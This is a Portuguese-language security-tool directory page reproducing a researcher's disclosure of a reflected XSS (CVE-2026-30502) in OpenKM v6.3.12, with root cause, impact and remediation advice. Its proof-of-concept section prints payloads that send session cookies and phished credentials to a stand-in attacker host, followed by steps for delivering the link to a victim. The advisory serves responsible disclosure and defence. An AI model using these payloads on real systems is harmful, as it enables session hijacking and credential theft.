Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — Documentação e prova de conceito para CVE-2026-30502, uma vulnerabilidade XSS refletida no OpenKM v6.3.12. Inclui análise técnica, causa raiz, avaliação de impacto e orientações de remediação para pesquisadores de segurança e testadores de penetração. | Kitploit
Ferramentas/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Ferramentas de PhishingAnálise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Documentação e prova de conceito para CVE-2026-30502, uma vulnerabilidade XSS refletida no OpenKM v6.3.12. Inclui análise técnica, causa raiz, avaliação de impacto e orientações de remediação para pesquisadores de segurança e testadores de penetração.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 2 mesesAinda não revisado

🛡️ CVE-2026-30502 — XSS Refletido no OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Descoberto e Reportado por Dharmendra Kumar — Pesquisador de Segurança

Cibersegurança | Testes de Penetração | Pesquisa de Vulnerabilidades | Divulgação Responsável


📌 Índice

  • Visão Geral
  • Detalhes do CVE
  • Produto Afetado
  • Descrição da Vulnerabilidade
  • Análise da Causa Raiz
  • Impacto e Avaliação de Risco
  • Prova de Conceito (PoC)
  • Remediação e Recomendações
  • Cronograma de Divulgação
  • Referências
  • Sobre o Pesquisador

🔍 Visão Geral

Este repositório documenta a divulgação responsável do CVE-2026-30502, uma vulnerabilidade de Cross-Site Scripting Refletido (XSS) identificada no OpenKM v6.3.12 — um sistema de gerenciamento de documentos open-source amplamente utilizado em ambientes corporativos e governamentais.

A vulnerabilidade existe no parâmetro Content, que reflete a entrada fornecida pelo usuário de volta ao navegador sem a devida sanitização ou codificação de saída. Um atacante pode criar uma URL maliciosa contendo JavaScript embutido e realizar engenharia social para que a vítima clique nela, resultando na execução de scripts na sessão do navegador da vítima.

⚠️ Severidade: Média–Alta | Vetor de Ataque: Rede | Privilégios Necessários: Nenhum | Interação do Usuário: Necessária


📋 Detalhes do CVE


📦 Produto Afetado

OpenKM é um sistema de gerenciamento de documentos (DMS) gratuito e de código aberto que fornece uma interface web para gerenciar, auditar e distribuir documentos empresariais. É usado por empresas, órgãos governamentais e instituições educacionais em todo o mundo.

  • Nome do Produto: OpenKM Document Management System
  • Versão Afetada: v6.3.12
  • Site do Fornecedor: https://www.openkm.com
  • Categoria: Sistema de Gerenciamento de Documentos (DMS)
  • Linguagem / Stack: Java (JSP / Spring Framework)

🧨 Descrição da Vulnerabilidade

Uma vulnerabilidade de Cross-Site Scripting Refletido (XSS) foi identificada no OpenKM v6.3.12 através do parâmetro Content. A aplicação falha ao validar ou codificar a entrada fornecida pelo usuário antes de refleti-la no corpo da resposta HTTP, permitindo que JavaScript arbitrário seja injetado e executado no navegador da vítima.

Diferentemente do XSS Armazenado, a carga útil do XSS Refletido não é persistida no banco de dados — em vez disso, ela viaja dentro de uma URL maliciosa. O ataque depende de a vítima ser enganada a clicar em um link malicioso (entregue por e-mail, mídia social ou campanhas de phishing), após o qual a carga útil é executada silenciosamente no navegador da vítima, no contexto da sessão da vítima.

Fluxo do Ataque

root@kitploit:~
Atacante cria URL maliciosa
        │
        ▼
Vítima clica no link (phishing / engenharia social)
        │
        ▼
Navegador envia requisição GET/POST com a carga útil no parâmetro `Content`
        │
        ▼
OpenKM reflete entrada não sanitizada diretamente na resposta HTML
        │
        ▼
Navegador analisa e executa JavaScript injetado
        │
        ▼
Sessão sequestrada / credenciais roubadas / conta comprometida

🔬 Análise da Causa Raiz

A vulnerabilidade resulta da falha da aplicação em impor controles de segurança de entrada e saída no parâmetro Content:

root@kitploit:~
URL Criada pelo Usuário ──► Parâmetro Content ──► [SEM Validação]
       ──► Refletido na Resposta HTML ──► [SEM Codificação]
              ──► Navegador Executa Script ──► Conta Comprometida

💥 Impacto e Avaliação de Risco

A exploração bem-sucedida desta vulnerabilidade pode levar a:


🧪 Prova de Conceito (PoC)

⚠️ Aviso Legal: As informações a seguir são compartilhadas estritamente para fins educacionais e de pesquisa em segurança, sob os princípios de divulgação responsável. Não teste ou use isso contra sistemas que você não possui ou para os quais não possui autorização explícita por escrito para avaliar.

Exemplos de Carga Útil (Genéricos)

root@kitploit:~
// Prova básica de execução
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Exfiltração de cookie de sessão
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Overlay de phishing de credenciais
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Usuário"/>'
    +'<input name="p" type="password" placeholder="Senha"/>'
    +'<button>Entrar</button></form>';
  document.body.prepend(d);
</script>

Estrutura da URL Maliciosa Criada

root@kitploit:~
https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>

Passos para Reproduzir

  1. Identifique o endpoint vulnerável no OpenKM v6.3.12 que reflete o parâmetro Content
  2. Crie uma URL anexando uma carga útil XSS ao parâmetro Content
  3. Codifique a carga útil em URL, se necessário
  4. Envie o link criado para uma vítima por e-mail, chat ou qualquer vetor de engenharia social
  5. Quando a vítima abrir o link em sua sessão autenticada do navegador, a carga útil será executada
  6. Observe a execução do JavaScript, roubo de cookies ou comportamento de redirecionamento

🛠️ Remediação e Recomendações

Para Desenvolvedores / Fornecedores

Para Administradores de Sistema

  • 🔒 Restringir o acesso ao OpenKM a redes internas/confiáveis por meio de regras de firewall
  • 🛡️ Implantar um Firewall de Aplicação Web (WAF) com assinaturas de detecção de XSS como controle compensatório
  • 📊 Monitorar logs de acesso do servidor web em busca de tags de script inesperadas ou cargas úteis codificadas em strings de consulta
  • 🔄 Manter a instalação do OpenKM atualizada com a versão de segurança mais recente
  • 📧 Treinar os usuários para terem cuidado ao clicar em links não solicitados para o DMS

📅 Cronograma de Divulgação

Os princípios completos de divulgação responsável foram seguidos durante todo este processo, incluindo coordenação com o fornecedor e engajamento com o Programa CVE antes de qualquer divulgação pública.


📚 Referências

  • 🔗 Entrada MITRE CVE — CVE-2026-30502
  • 🔗 NVD — National Vulnerability Database
  • 🔗 Site Oficial do OpenKM
  • 🔗 Folha de Dicas de Prevenção de XSS da OWASP
  • 🔗 CWE-79: Cross-site Scripting
  • 🔗 OWASP Top 10 — A03:2021 Injeção
  • 🔗 OWASP Java Encoder

👨‍💻 Sobre o Pesquisador

Dharmendra Kumar

Pesquisador de Segurança | Testador de Penetração | Caçador de Bugs | Contribuidor de CVE

Dharmendra Kumar é um pesquisador independente de cibersegurança especializado em segurança de aplicações web, testes de penetração e divulgação responsável de vulnerabilidades. Sua pesquisa foca em identificar e reportar de forma responsável falhas de segurança reais em softwares amplamente utilizados — contribuindo para aplicações mais seguras para usuários em todo o mundo.

Áreas de Especialização:

  • 🌐 Testes de Penetração em Aplicações Web
  • 🐬 Caça a Bugs e Pesquisa de CVE
  • 🔍 Descoberta de Vulnerabilidades e Avisos de Segurança
  • 📋 Divulgação Responsável e Relatórios Coordenados de CVE

Conecte-se comigo:

GitHub LinkedIn Twitter Instagram Medium


⚖️ Aviso Legal

Este repositório destina-se exclusivamente para fins educacionais e informativos. Os detalhes da vulnerabilidade e as cargas úteis de prova de conceito são publicados de acordo com os princípios de divulgação responsável. O autor não endossa nem se responsabiliza por qualquer uso não autorizado destas informações. Sempre obtenha permissão explícita por escrito antes de realizar testes de segurança em qualquer sistema que você não possua.


🙏 Agradecimentos

Agradecimentos especiais:

  • À equipe de desenvolvimento do OpenKM pela cooperação e receptividade durante a divulgação coordenada
  • Ao Programa MITRE CVE por atribuir e gerenciar o identificador CVE
  • À comunidade global de pesquisa em segurança e caça a bugs por elevar continuamente o nível da segurança de aplicações

⭐ Se esta pesquisa foi útil para você, por favor considere dar uma estrela neste repositório.

Pesquisa em segurança compartilhada abertamente para tornar a web mais segura para todos.

© 2026 Dharmendra Kumar — Todos os Direitos Reservados

Baixar ferramenta
CampoDetalhes
ID CVECVE-2026-30502
ProdutoOpenKM
Versão Afetadav6.3.12
Classe de VulnerabilidadeCross-Site Scripting Refletido (XSS)
Parâmetro VulnerávelContent
CWECWE-79: Neutralização Incorreta da Entrada Durante a Geração de Páginas Web
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
SeveridadeMédia–Alta
PublicadorPrograma MITRE CVE
PesquisadorDharmendra Kumar
Tipo de DivulgaçãoResponsável / Coordenada
FraquezaDescrição
❌ Nenhuma Validação de EntradaO parâmetro Content aceita caracteres HTML/JavaScript brutos sem restrição ou filtragem
❌ Nenhuma Codificação de SaídaOs valores refletidos são escritos na resposta HTML sem codificação de entidades HTML
❌ Falta de Cabeçalho CSPNenhuma Política de Segurança de Conteúdo é aplicada para bloquear execução de scripts inline
❌ Cookies Sem HTTPOnlyTokens de sessão são acessíveis via JavaScript, permitindo roubo direto de cookies
RiscoDescrição
🍪 Sequestro de SessãoRoubar tokens de sessão ativos via document.cookie para se passar pela vítima
🔑 Coleta de CredenciaisInjetar overlays falsos de login para capturar nomes de usuário e senhas em texto claro
📤 Divulgação de InformaçõesExfiltrar conteúdo sensível de documentos, dados de usuários ou configurações internas
🎣 Ataques de PhishingExibir páginas falsas convincentes hospedadas dentro do domínio confiável do OpenKM
👤 Assunção de ContaRealizar ações autenticadas arbitrárias em nome da vítima
⚙️ Ações Não AutorizadasModificar, excluir ou exfiltrar documentos dentro do DMS
🖥️ Distribuição de MalwareRedirecionar vítimas para sites controlados por atacantes que hospedam downloads maliciosos
RecomendaçãoImplementação
✅ Validação de EntradaRejeitar ou remover caracteres especiais HTML (<, >, ", ', ;) de todos os parâmetros controlados pelo usuário
✅ Codificação de SaídaAplicar codificação HTML sensível ao contexto usando bibliotecas como o OWASP Java Encoder antes de renderizar dados refletidos
✅ Política de Segurança de ConteúdoImplantar um cabeçalho CSP restrito: Content-Security-Policy: default-src 'self'; script-src 'self'
✅ Cookies HTTPOnlyDefinir os sinalizadores HttpOnly e Secure em todos os cookies de sessão para bloquear acesso via JavaScript
✅ Bibliotecas de SegurançaIntegrar OWASP AntiSamy ou DOMPurify para sanitização robusta
✅ AtualizaçãoAplicar imediatamente o patch de segurança mais recente fornecido pelo fornecedor
DataEvento
🔍 DescobertaVulnerabilidade identificada durante avaliação de segurança do OpenKM v6.3.12
📧 Notificação ao FornecedorRelatório de divulgação responsável enviado à equipe de segurança do OpenKM
🤝 Reconhecimento do FornecedorA equipe do OpenKM reconheceu o relatório de vulnerabilidade
📝 Atribuição do CVECVE-2026-30502 atribuído através do Programa MITRE CVE
🌐 Divulgação PúblicaDivulgação pública coordenada após o período de remediação